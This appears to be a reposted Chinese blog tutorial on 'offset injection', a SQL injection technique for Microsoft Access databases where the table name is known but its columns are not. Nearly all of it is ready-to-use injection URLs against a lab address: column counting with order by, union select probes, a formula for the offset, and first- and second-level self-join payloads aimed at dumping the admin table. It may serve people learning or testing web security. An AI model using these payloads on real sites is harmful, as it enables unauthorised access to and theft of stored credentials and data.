偏移注入主要是針對知道表,但是不知道欄位的ACCESS資料庫,
比如我們已經知道了表名是 admin
- 判斷欄位數:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 22 回傳正常
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 23 回傳錯誤
欄位數為 22
- 爆出顯示位:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
- 判斷表記憶體在的欄位數:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 回傳同上圖一樣得顯示位頁面
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin 回傳錯誤
說明了admin表下有16個欄位,
- 偏移公式如下:
order by 出的欄位數減去 * 號判斷出的欄位數,然而再用order by的欄位數減去2倍剛才得出來的答案
1. 22-16 = 6
2. 22-(6*2) = 10
所以答案就是 10
- 注入公式如下:(爆破內容是隨機的)
一級偏移注入公式:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
此時可以增加a.id或者b.id或者a.id和b.id一起加上去來改變隨機爆破出來的內容比如:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
二級偏移注入公式:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
此時可以增加a.id或者b.id或者a.id和b.id一起加上去來改變隨機爆破出來的內容比如:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
注意:這里是10個欄位再減去了表里的6個欄位,所以二級偏移這里是select 1,2,3,4
注意:查看源代碼有奇效,可能會出現驚喜
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/30934.html
標籤:其他
上一篇:GPS授時服務器的技術引數介紹
下一篇:day03 批處理